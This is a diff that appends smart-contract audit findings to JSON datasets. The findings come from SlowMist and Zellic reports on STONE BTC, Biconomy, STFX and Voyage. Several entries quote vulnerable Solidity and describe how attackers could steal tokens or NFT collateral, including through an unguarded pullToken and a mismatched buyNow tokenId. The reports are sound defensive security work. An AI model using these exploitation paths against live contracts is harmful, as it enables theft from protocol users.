In the function WithdrawRequests.info, requests._values.length is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 22. In the function ValidatorList.add, set._activeValidatorIndex and set._activePendingElementIndex are both read three times from the storage when their value could be cached in the memory. 23. In the function ValidatorList.shift, set._activePendingElementIndex is read two times from the storage when its value could be cached in the memory. 24. In the functions _autocompoundAccount, _autoCompoundUserPendingDepositedBalance, _autoCompoundUserBalance, and _withdrawFromAutocompound of AutocompoundAccounting, the field pendingDepositedBalances.length of the staker is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 25. In the first for loop of the function AutocompoundAccounting._autocompoundAccount, both staker.pendingDepositedBalances[j].period and staker.activePendingDepositedElementIndex are read twice from the storage and could be cached. 26. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited, one execution path reads staker.activePendingDepositedElementIndex three times from storage; it could be cached. Everstake - ETH B2C Staking - 29 \f27. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited or to activated, both staker.pendingBalance.balance and staker.pendingBalance.period are read twice from storage. 28. In AutocompoundAccounting._autoCompoundUserPendingDepositedBalance(), staker.pendingBalance.period is read twice from storage. 29. In AutocompoundAccounting._autoCompoundUserBalance(), at each iteration of the for loop, if the condition of the if statement is not met, both stakerAutocompoundBalance.pendingDepositedBalances[j].balance and stakerAutocompoundBalance.pendingDepositedBalances[j].period are read twice from storage. 30. The calls to _userActiveBalance to get only the depositedBalance could be replaced by a simple storage read to save gas. 31. At the end of Accounting._simulateAutocompound(), pendingAmount == pendingRestaked always holds as, if if (pendingAmount > 0) is entered, then they are both set to 0. Otherwise pendingAmount == 0, and one should always have pendingAmount >= pendingRestaked, meaning that there is no need to keep both variables for the while loop. The gas optimizations have been applied. ", "labels": [ "ChainSecurity" ], diff --git a/results/slowmist_findings.json b/results/slowmist_findings.json index f275912..25cb787 100644 --- a/results/slowmist_findings.json +++ b/results/slowmist_findings.json @@ -6796,5 +6796,82 @@ "Type: Others", "Severity: High" ] + }, + { + "title": "Potential Token Compatibility Issues", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, users can deposit funds through the deposit/depositMultiple functions. The contract directly transfers the user-specified amount of wrapped BTC tokens using the safeTransferFrom function. It is important to note that the contract is not compatible with fee-on-transfer wrapped BTC tokens. Similarly, when users make deposits or withdrawals, the contract performs decimal conversion using 18 - tokenDecimals[_token]. This renders the contract incompatible with any wrapped BTC tokens that have a decimal greater than 18. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Suggestion" + ] + },
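The decimal incompatibility described in this finding can be illustrated with a small hedged sketch; the helper name and the scaling direction (wrapped-BTC amounts scaled up to 18 decimals) are assumptions inferred from the report:

    // Hypothetical normalization helper. For a token with more than 18
    // decimals, 18 - tokenDecimals[token] underflows and the call reverts,
    // which is exactly the incompatibility the finding points out.
    function _toStoneAmount(address token, uint256 amount) internal view returns (uint256) {
        return amount * 10 ** (18 - tokenDecimals[token]);
    }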
", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Potential risk of not being able to collect fees", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, users are charged a certain fee when making deposits or withdrawals. The fee amount is determined by amount * feeRate / FEE_BASE . Due to Solidity's division operation truncating the decimal part, if the user's deposit or withdrawal amount is relatively small, the calculated fee will be 0. This prevents the contract from collecting deposit/withdrawal fees. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Low" + ] + }, + { + "title": "Unnecessary unchecked", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, all the for loop functionalities use unchecked for incrementing i to reduce gas consumption. However, the contract's Solidity compilation uses ^0.8.26 , and Solidity introduced the unchecked loop increments feature in version 0.8.22, making the use of unchecked unnecessary. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Gas Optimization Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Risk of DoS when removing supported tokens", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, privileged roles can add/remove supported wrapped BTC tokens through the addSupportedTokens/removeSupportedTokens functions. When performing the removeSupportedTokens operation, the contract checks that the balance of the token being removed must be zero. This can be easily exploited, as users can donate a small amount of tokens to prevent the removeSupportedTokens function from working properly. It is also important to note that when users withdraw, the contract converts the decimal to the decimal of the token being withdrawn. When the decimal of this token is smaller than the decimal of STONE BTC, there will always be a small amount of dust tokens left in the vault. This indirectly prevents the removeSupportedTokens function from working correctly. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Denial of Service Vulnerability", + "Severity: High" + ] + }, + { + "title": "The actual deposit amount may dier from the contract balance", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTCVault contract, the _checkDepositAllowed function checks the depositCapacity based on the balance of wrapped BTC tokens in the contract. Similarly, the getDepositAmounts function retrieves token balances to determine the deposit amounts. These values may dier from the actual deposit amounts made by users. Users might accidentally transfer supported tokens into the vault, or some users might send small donations to the vault. Both scenarios will cause the above two functions to obtain amounts that are greater than the users' actual deposit amounts. 
", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Low" + ] + }, + { + "title": "Not checking if withAmount is greater than 0 when retrieving all tokens", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the Proposal contract, users can retrieve all their STONE tokens used for voting through the retrieveAllToken function. It uses a temporary variable withAmount to record the amount of STONE tokens that can be withdrawn. However, it does not check if withAmount is greater than 0 before initiating the transfer, which may result in the contract sending a 0 transfer and wasting gas. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Design Logic Audit", + "Severity: Suggestion" + ] + }, + { + "title": "Risks of excessive privilege", + "html_url": "https://github.com/slowmist/Knowledge-Base/tree/master/open-report-V2/smart-contract/STONE BTC - SlowMist Audit Report_en-us.pdf", + "body": "In the StoneBTC contract, the contract deployer is set as the DEFAULT_ADMIN_ROLE. The admin role can arbitrarily change the MINTER_ROLE/BURNER_ROLE roles, which are involved in minting and burning STONE BTC. This leads to the risk of excessive privileges. Similarly, in the StoneBTCVault and Proposal contracts, the initial DEFAULT_ADMIN_ROLE is also the deployer. Assigning sensitive permissions to an EOA address not only creates the risk of excessive privileges but also introduces a single point of failure. ", + "labels": [ + "SlowMist", + "STONE BTC - SlowMist Audit Report", + "Type: Authority Control Vulnerability Audit", + "Severity: Medium" + ] } ] \ No newline at end of file diff --git a/results/zellic_findings.json b/results/zellic_findings.json index c6d6e80..1c56386 100644 --- a/results/zellic_findings.json +++ b/results/zellic_findings.json @@ -45351,6 +45351,3790 @@ "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The Secp256r1 module implements critical functionality for signature validation, and it is implemented in a nonstandard and highly optimized way. To ensure that the library works in common cases, edge cases, and invalid cases, it is crucial to have proper test coverage for these types of primitives. There are currently no tests using this library, making it hard to see if it works at all. Missing test cases could lead to critical bugs in the cryptographic primitives. These could lead to, for example, Signature forgery and total account takeover Surprising or very random gas costs Proper signatures not validating, leading to DOS Recovery of private keys in extreme cases. Google has Project Wycheproof, which includes many test vectors for common cryp- tographic libraries and their operations. A good match for this module, which uses Secp256r1 (aka NIST P-256) and 256-bit hashes, is to use the ecdsa_secp256r1_sha25 6_test.json test vectors. Do note that many of these vectors target DER decoding, so it is safe to skip tests tagged \u201cBER\u201d. Additionally, test cases where they use numbers larger than 256 bits can be ignored, as they are invalid in Solidity when using uint256 types. These test vectors can be somewhat easily converted to Solidity library tests, giving hundreds of tests for free. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. 
Zellic Biconomy Labs", "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" }, + { + "title": "3.4 Modexp has arbitrary gas limit", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: High : Medium The Secp256r1 library makes use of the EIP-198 precompile in order to do modular exponentiation. This function is located at address 0x5 and is called near the end of the function. function modexp( uint _base, uint _exp, uint _mod ) internal view returns (uint ret) { // bigModExp(_base, _exp, _mod); assembly { if gt(_base, _mod) { _base := mod(_base, _mod) } // Free memory pointer is always stored at 0x40 let freemem := mload(0x40) mstore(freemem, 0x20) mstore(add(freemem, 0x20), 0x20) mstore(add(freemem, 0x40), 0x20) mstore(add(freemem, 0x60), _base) mstore(add(freemem, 0x80), _exp) mstore(add(freemem, 0xa0), _mod) let success := staticcall(1500, 0x5, freemem, 0xc0, freemem, 0x20) switch success case 0 { revert(0x0, 0x0) } default { ret := mload(freemem) } } } A gas limit of 1,500 is set for this operation. After EIP-2565, the precompile was updated to become more optimized and cost less gas. Before this optimization, the gas cost was sometimes very high and often overestimated. The EIP provides a function to calculate the approximate gas cost, and using the parameters from the library, we calculated it to be around 1,360 gas, which is barely within the limit. With EIP-198 pricing, the cost was significantly higher. Some chains have not yet implemented this optimization \u2014 one example being the BNB chain, which plans to implement their equivalent BEP-225 around August 30th, 2023. The standard for signature validation methods, EIP-1271, also states the following: Since there [is] no gas-limit expected for calling the isValidSignature() function, it is possible that some implementation will consume a large amount of gas. It is therefore important to not hardcode an amount of gas sent when calling this method on an external contract as it could prevent the validation of certain signatures. On chains without the gas optimization change for the precompile, the contract will either not work or randomly work for certain keys and signatures but not others. In the worst-case scenario, someone could be extremely lucky and manage to transfer money in but not be able to get them out again. The main risk is just the functionality of the module being broken. Provide more or the maximum amount of gas to this function call: let success := staticcall(not(0), 0x5, freemem, 0xc0, freemem, 0x20) This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + },
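For illustration, the same recommendation can be written with gas() instead of the not(0) literal shown in the finding; this is an equivalent-in-effect sketch using the names from the snippet above, not the shipped fix:

    assembly {
        // No hardcoded stipend: the modexp precompile at 0x05 receives all
        // remaining gas, so chains still on EIP-198 pricing also succeed.
        let success := staticcall(gas(), 0x5, freemem, 0xc0, freemem, 0x20)
        if iszero(success) { revert(0x0, 0x0) }
    }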
+ { + "title": "3.1 Emergency withdraw functions are missing zero address checks", + "labels": [ + "Zellic" + ], + "body": "Target: BiconomyTokenPaymaster Category: Coding Mistakes Likelihood: Low Severity: Medium : Low The withdrawERC20(), withdrawERC20Full(), withdrawMultipleERC20(), and withdrawMultipleERC20Full() are emergency withdrawal functions that can be called by the owner to withdraw ERC20 tokens that were mistakenly sent to the Paymaster contract. These tokens are withdrawn to a specified target address. The emergency withdraw functions are missing zero address checks for the target address that the tokens will be withdrawn to. If the owner attempts to withdraw a substantial amount of tokens and accidentally sets target to address(0), the tokens will be lost forever. Consider adding in checks to ensure that target is not equal to address(0). This has already been done in the withdrawAllNative() function. Biconomy Labs implemented a fix for this issue in commit a88357ef2. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Paymaster data is parsed without performing a length check", + "labels": [ + "Zellic" + ], + "body": "Target: BiconomyTokenPaymaster Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The parsePaymasterAndData() function is used to parse the UserOperation structure's paymasterAndData field. The paymasterAndData field can contain data in any format, with the format being defined by the Paymaster itself. The function does not perform any length checks on the paymasterAndData field before attempting to parse it. function parsePaymasterAndData( bytes calldata paymasterAndData ) public pure returns (/* ... */) { /* ... */ (/* ... */) = abi.decode( paymasterAndData[VALID_PND_OFFSET:SIGNATURE_OFFSET], (uint48, uint48, address, address, uint256, uint256) ); signature = paymasterAndData[SIGNATURE_OFFSET:]; } In the above case, VALID_PND_OFFSET is 21, while SIGNATURE_OFFSET is 213. If the paymasterAndData structure does not contain at least that many bytes in it, then the function will revert. As this field is fully controllable by a user through the UserOperation structure, and the parsing is done prior to the signature check in _validatePaymasterUserOp(), this would allow a user to trigger reverts, which would cause the Entrypoint contract that's calling into _validatePaymasterUserOp() to waste gas. Consider adding a check to ensure that the paymasterAndData structure has the correct length. If it does not, consider returning an error to allow the Entrypoint contract to ignore this UserOperation and continue. Biconomy Labs implemented a fix for this issue in commit 6787a366. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function _getTokenPrice() could return unexpected value", + "labels": [ + "Zellic" + ], + "body": "Target: ChainlinkOracleAggregator.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The _getTokenPrice() function in the ChainlinkOracleAggregator contract performs an external staticcall to fetch the price of the specified token. function _getTokenPrice( address token ) internal view returns (uint256 tokenPriceUnadjusted) { (bool success, bytes memory ret) = tokensInfo[token].callAddress.staticcall(tokensInfo[token].callData); if (tokensInfo[token].dataSigned) { tokenPriceUnadjusted = uint256(abi.decode(ret, (int256))); } else { tokenPriceUnadjusted = abi.decode(ret, (uint256)); } } The return value success of the staticcall is not checked, which leads to the possibility that when success == false, the function return value tokenPriceUnadjusted could be zero. This could cause the caller function getTokenValueOfOneNativeToken to calculate the exchangeRate incorrectly, which would ultimately affect the result of exchangePrice.
This could potentially lead to unexpected bugs in the future. Consider checking the value of success, or check the return value at the caller\u2019s side. Biconomy Labs implemented a fix for this issue in commit ca06c2a4. Zellic Biconomy Labs 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: BiconomyTokenPaymaster.sol Function: parsePaymasterAndData(byte[] paymasterAndData) This function is used to parse the paymasterAndData field of the UserOperation struct. Inputs", + "labels": [ + "Zellic" + ], + "body": "paymasterAndData \u2013 Control: Fully controlled by user. \u2013 Constraints: It must be data in a valid format, where the data from the VALID_PND_OFFSET-1 to the VALID_PND_OFFSET should represent the priceSo urce. The data from the VALID_PND_OFFSET to the SIGNATURE_OFFSET is the ABI-encoded validUntil, validAfter, feeToken, oracleAggregator, exchan geRate, and fee. Data following the SIGNATURE_OFFSET position are a valid signature. \u2013 : This is the structural data to be parsed. Branches and code coverage (including function calls) Intended branches Succeeds with parsing data properly. 4\u25a1 Test coverage Negative behavior Invalid paymasterAndData causes revert. \u25a1 Negative test Zellic Biconomy Labs Function: _postOp(PostOpMode mode, bytes calldata context, uint256 actu alGasCost) This function executes the Paymaster\u2019s payment conditions. Inputs mode \u2013 Control: Not controlled by user. \u2013 Constraints: Must be one of these: opSucceeded, opReverted, or postOpReve rted. \u2013 : Used to determine the state of the operation. context \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This contains the payment conditions signed by the Paymaster. actualGasCost \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This is the amount to be paid back to the Entrypoint. Branches and code coverage (including function calls) Intended branches Succeeds with mode opSucceeded or opReverted. 4\u25a1 Test coverage Succeeds with mode postOpReverted. 4\u25a1 Test coverage Oracle aggregator\u2019s exchange rate is used. \u25a1 Test coverage UserOp\u2019s exchange rate is used. \u25a1 Test coverage Negative behavior Failed transferFrom() leads to event being emitted. 4\u25a1 Negative test Zellic Biconomy Labs Function: _validatePaymasterUserOp(UserOperation calldata userOp, bytes 32 userOpHash, uint256 requiredPreFund) This function is used to verify that the UserOperation\u2019s Paymaster data were signed by the external signer. Inputs userOp \u2013 Control: Fully controlled by user. \u2013 Constraints: All fields are used in signature validation and thus must be valid. \u2013 : This is the UserOperation being validated. userOpHash \u2013 Control: Not controlled by user. \u2013 Constraints: N/A. \u2013 : This is returned as part of the context structure. requiredPreFund \u2013 Control: Not controlled by user. 
\u2013 Constraints: N/A. \u2013 Impact: This is the required amount of prefunding for the paymaster. Branches and code coverage (including function calls) Intended branches Succeeds with valid gas limit, userOp, and requiredPrefund. \u2611 Test coverage Negative behavior Invalid signature causes error to be returned. \u2611 Negative test Insufficient requiredPrefund causes revert. \u25a1 Negative test Parsing the Paymaster data causes revert. \u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ChainlinkOracleAggregator.sol Function: getTokenValueOfOneNativeToken(address token) This function is used to get the value of one native token in terms of the given token. Inputs", + "labels": [ + "Zellic" + ], + "body": "token \u2013 Control: Fully controlled by user. \u2013 Constraints: Should be a valid ERC20 token address. \u2013 Impact: This is the token for which the price is to be queried. Branches and code coverage (including function calls) Intended branches Check price result of a single token. \u2611 Test coverage Negative behavior Tokens with zero tokenPriceUnadjusted cause revert. \u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Module: USDCPriceFeedPolygon.sol Function: getThePrice() This function is used to get the latest price. Branches and code coverage (including function calls) Intended branches", + "labels": [ + "Zellic" + ], + "body": "Successfully obtained the latest prices. \u2611 Test coverage 5 Audit Results At the time of our audit, the audited code was not deployed to mainnet Ethereum. During our assessment on the scoped Token Paymaster contracts, we discovered three findings. No critical issues were found. Two were of low impact and the remaining finding was informational in nature.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Token Paymaster - Zellic Audit Report.pdf" + }, + { + "title": "3.1 ABI-encoded inputs can mismatch specified amount", + "labels": [ + "Zellic" + ], + "body": "Target: Swap.sol Category: Coding Mistakes Likelihood: Medium Severity: High Impact: High A manager or admin can execute a swap via Uniswap\u2019s universal router. However, they can potentially cause a mismanagement of funds if they abi.encode a different value in the inputs parameter than what is specified in the amountIn parameter for the swap. The following function permits the swap: function swapUniversalRouter( address tokenIn, address tokenOut, uint160 amountIn, bytes calldata commands, bytes[] calldata inputs, ... ) external override onlyTrade returns (uint96) { ... if (deadline > 0) universalRouter.execute(commands, inputs, deadline); ... } As seen in this snippet, universalRouter.execute(commands, inputs, deadline) bears no relation to the amountIn parameter, and thus inputs, which is supposed to encode the amountIn, can carry a different value. The protocol uses amountIn for its internal accounting, which can therefore become out of sync. We recommend extracting the amountIn from the ABI-encoded inputs function parameter.
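One hedged way to implement that recommendation is sketched below. It assumes inputs[0] follows the universal router's V3_SWAP_EXACT_IN encoding (recipient, amountIn, amountOutMinimum, path, payerIsUser); the AmountInMismatch error and helper name are hypothetical, not STFX's actual remediation:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Sketch: cross-check the declared amountIn against the value ABI-encoded
// in the router input before executing the swap.
abstract contract SwapSketch {
    error AmountInMismatch(uint256 declared, uint256 encoded);

    function _checkEncodedAmountIn(
        uint160 amountIn,
        bytes[] calldata inputs
    ) internal pure {
        // Assumes the V3_SWAP_EXACT_IN input layout.
        (, uint256 encodedAmountIn, , , ) = abi.decode(
            inputs[0],
            (address, uint256, uint256, bytes, bool)
        );
        if (encodedAmountIn != uint256(amountIn)) {
            revert AmountInMismatch(amountIn, encodedAmountIn);
        }
    }
}
```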
STFX acknowledged and resolved the issue in fb58bb9f.", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Possible denial of service in claim", + "labels": [ + "Zellic" + ], + "body": "Target: VestingFactory.sol Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: High When vestingAddresses attempt to claim, the system iterates through all addresses and sends funds accordingly. However, if the size of the vestingAddresses array becomes too large, a denial-of-service gas error can occur, preventing anyone from being able to claim funds. The following code corresponds to the claim function: for (uint256 i = 0; i < vestingAddresses.length;) { address v = vestingAddresses[i]; if (!IVesting(v).cancelled()) { if (IVesting(v).totalClaimedAmount() < IVesting(v).amount()) { IVesting(v).claim(); } } unchecked { ++i; } } New vesting addresses can be added using the createVestingStartingFrom and createVestingStartingFromNow methods. However, if the treasury calls these methods excessively, a large number of vesting addresses may accumulate, which can prevent anyone from being able to claim. Unfortunately, there is no way to remove vesting addresses once they have been added. We recommend exploring one of the following possibilities to address the issue: 1. Modify the claim function to take start and end indices, allowing users to claim their tokens in batches instead of all at once. 2. Implement a way to remove vesting addresses once they have been added to the system. This would prevent the accumulation of a large number of addresses that could lead to denial-of-service errors. 3. Set a maximum cap on the number of vesting addresses that can be added to the system. This would limit the potential for denial-of-service errors by preventing the system from becoming overloaded with too many vesting addresses. STFX acknowledged and resolved the issue in 6503abf8.", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Protocol does not check return value of ERC20 swaps", + "labels": [ + "Zellic" + ], + "body": "Target: Swap.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium Impact: Medium The ERC20 standard requires that transfer operations return a boolean success value indicating whether the operation was successful or not. Therefore, it is important to check the return value of the transfer function before assuming that the transfer was successful. This helps ensure that the transfer was executed correctly and helps avoid potential issues with lost or mishandled funds. The protocol\u2019s internal accounting will record failed transfer operations as a success if the underlying ERC20 token does not revert on failure. We recommend implementing one of the following solutions to ensure that ERC20 transfers are handled securely: 1. Utilize OpenZeppelin\u2019s SafeERC20 transfer methods, which provide additional checks and safeguards to ensure the safe handling of ERC20 transfers. 2. Strictly whitelist ERC20 coins that do not return false on failure and revert. This will ensure that only safe and reliable ERC20 tokens are used within the protocol. In general, it is important to exercise caution when integrating third-party tokens into the protocol. Tokens with hooks and atypical behaviors of the ERC20 standard can present security vulnerabilities that may be exploited by attackers.
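A minimal sketch of option 1 from the list above, using OpenZeppelin's SafeERC20 (which reverts both when a token returns false and when it returns no data); the contract and function names are illustrative only:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

// Sketch: SafeERC20 wraps the raw transfer so a failed transfer can never
// be recorded as a success by the protocol's accounting.
contract TreasurySketch {
    using SafeERC20 for IERC20;

    function payOut(IERC20 token, address to, uint256 amount) internal {
        token.safeTransfer(to, amount); // reverts on failure
    }
}
```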
We recommend thoroughly researching and reviewing any tokens that are considered for integration and performing a comprehensive security review of the entire system to identify and mitigate any potential vulnerabilities. STFX acknowledged and resolved the issue in 67276712.", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.4 High minimum investment amount", + "labels": [ + "Zellic" + ], + "body": "Target: Spot.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium Impact: Medium While the minimal investment permitted by the protocol is intended to establish a reasonable lower bound for investment amounts, the current restriction of 1e18 can be excessive for certain tokens, such as wBTC, particularly during a bull market when prices are high. This can make it difficult for everyday users to enter the protocol and limits the accessibility of the system. The following code sets a lower bound on the minimal investment amount: function addMinInvestmentAmount(address _token, uint96 _amount) external override onlyOwner { if (_amount < 1e18) revert ZeroAmount(); minInvestmentAmount[_token] = _amount; emit MinInvestmentAmountChanged(_token, _amount); } The current minimal investment amount of 1e18 may be too high for certain high-value coins such as wBTC, where this amount equates to approximately $30K USD and could potentially be even higher in the future. This high barrier to entry may limit accessibility for everyday users and could ultimately impact the growth and sustainability of the system. We recommend removing the minimal investment amount. STFX acknowledged and resolved the issue in ca4e2157.", + "html_url": "https://github.com/Zellic/publications/blob/master/STFX - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Public pullToken function allows to steal ERC20 tokens for which Voyage has approval", + "labels": [ + "Zellic" + ], + "body": "Target: PeripheryPayments.sol Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The PeripheryPayments::pullToken function does not perform any access control and can be used to invoke transferFrom on any token. function pullToken( IERC20 token, uint256 amount, address from, address recipient ) public payable { token.safeTransferFrom(from, recipient, amount); } Furthermore, we have two additional observations about this function: It is unnecessarily marked as payable. It allows calling transferFrom on any contract, not just ERC20; since ERC721 tokens also have a compatible transferFrom function, pullToken could be used to invoke transferFrom on ERC721 contracts as well. At the time of this review, the Voyage contract does not hold nor is supposed to have approval for any ERC721 assets, so this issue has no impact yet. An attacker can use this function to invoke transferFrom on any contract on behalf of Voyage, with arbitrary arguments. This can be exploited to steal any ERC20 token for which Voyage has received approval. Apply strict access control to this function, allowing only calls from address(this). Voyage has applied the appropriate level of access control to this function by making it internal. Furthermore, the contract has been removed and its functionality factored into a library as reflected in commit 9a2e8f42.",
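For illustration, a sketch of the recommended guard is shown below; the OnlySelf error is hypothetical, and Voyage's actual remediation instead moved the helper into a library of internal functions:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

// Sketch: only the contract itself may trigger pulls, closing the public
// transferFrom proxy described in the finding.
contract PeripheryPaymentsSketch {
    using SafeERC20 for IERC20;

    error OnlySelf();

    function pullToken(
        IERC20 token,
        uint256 amount,
        address from,
        address recipient
    ) public {
        if (msg.sender != address(this)) revert OnlySelf();
        token.safeTransferFrom(from, recipient, amount);
    }
}
```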
Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Signature clash allows calls to transferReserve to steal NFT collateral", + "labels": [ + "Zellic" + ], + "body": "Target: VaultFacet.sol Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The VaultFacet contract has a transferReserve(_vault, _currency, _to, _amount) function meant to be used by the vault owner for recovering any ERC20 assets held by their vault. The function calls execute on the given vault, instructing it to call transferFrom(from , to, amount) on the address specified by the _currency argument, with the to and amount arguments specified by the transferReserve caller. An attacker can take advantage of this capability by making the vault call transferFrom on the ERC721 contract controlling a collateral held by the vault. This is possible since ERC20 transferFrom and ERC721 transferFrom signatures are identical; therefore, the calldata format required by both functions is the same. An attacker can transfer any NFT held by a vault without having fully repaid the debt for which the NFT was held as collateral. Ensure the contract being called is not the contract of an NFT being held as collateral. An additional recommended hardening measure would be to entirely deny calls to ERC721 contracts. A possible approach to accomplish this is to try to call a harmless ERC721 method on the contract and reverting the transaction if the call does not fail. Commit 7460dc9a was indicated as containing the remediation. The commit appears to correctly fix the issue. The transferReserve function has been renamed to transf erCurrency and now takes as input the address of an NFT collection. The currency to be transferred is obtained from the metadata associated to the collection in Voyage storage. Voyage updated the code in a subsequent commit, and (as of commit f558e630) the t Zellic Voyage Finance ransferCurrency function again receives a _currency argument representing an ERC20 contract address. The change was made to ensure users can always withdraw ERC20 tokens that would otherwise be at risk of being stuck in their vault. That address is checked against data contained in Voyage storage to ensure it is not the address of an ERC721 contract used by Voyage, and the code seems still safe. We note that 25 commits exist between 7460dc9a and the one subject to our au- dit, applying changes that are both irrelevant as well as others potentially relevant to the remediation, increasing the difficulty of the review. In total, the diff between the reviewed and remediation commits amounts to 18 solidity files changed, with 137 in- sertions and 385 deletions. The changes include adding a checkCurrencyAddr function also used in transferCurrency, then renamed to checkCollectionAddr, which only en- sures that the address given as an argument is a deployed contract, not that it exists in the metadata stored by Voyage as the name could imply. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing calldata validation in buyNow results in stolen NFT", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Critical : Critical The _data calldata parameter passed to buyNow(...))) requires a consistency check against the _tokenId parameter. 
The _tokenId passed is recorded in LibAppStorage.ds().nftIndex[param.collection][param.tokenId] = composeNFTInfo(param); where nftInfo.isCollateral is set to true by composeNFTInfo(...). However, the actual NFT ordered from the market is specified in _data, which is not validated to match the given _tokenId. This allows an attacker to purchase a mismatching NFT, which is sent to the vault. The NFT corresponding to the _tokenId argument is marked as collateral for the loan instead of the one that was actually received. Therefore, the token can be withdrawn from the vault, as the following check in VaultFacet::withdrawNFT(...) will not revert the transaction: if (LibAppStorage.ds().nftIndex[_collection][_tokenId].isCollateral) { revert InvalidWithdrawal(); } This vector makes the current implementation vulnerable to several attacks. For example, buyNow can be called with tokenId = 10 and calldata _data containing tokenId = 15. The order will process, and an NFT with tokenId = 15 will be purchased. The NFT can then be withdrawn while having only paid the down payment. Validation checks should be added to ensure that the tokenId and collection passed in are consistent with the tokenId and collection passed in calldata _data. Additionally, validation modules should be added to the LooksRareAdapter and SeaportAdapter to validate all other order parameters. Currently, only the order selectors are validated. This additional lack of checks opens up the possibility for more missing-validation exploits on other variables. However, the core of the vulnerability is the same, and so we have grouped them all into one finding. Voyage has incorporated the necessary validation checks for tokenId and collection in commit 7937b13a. They have also included additional validation checks for isOrderAsk and taker in LooksRareAdapter and fulfillerConduitKey in 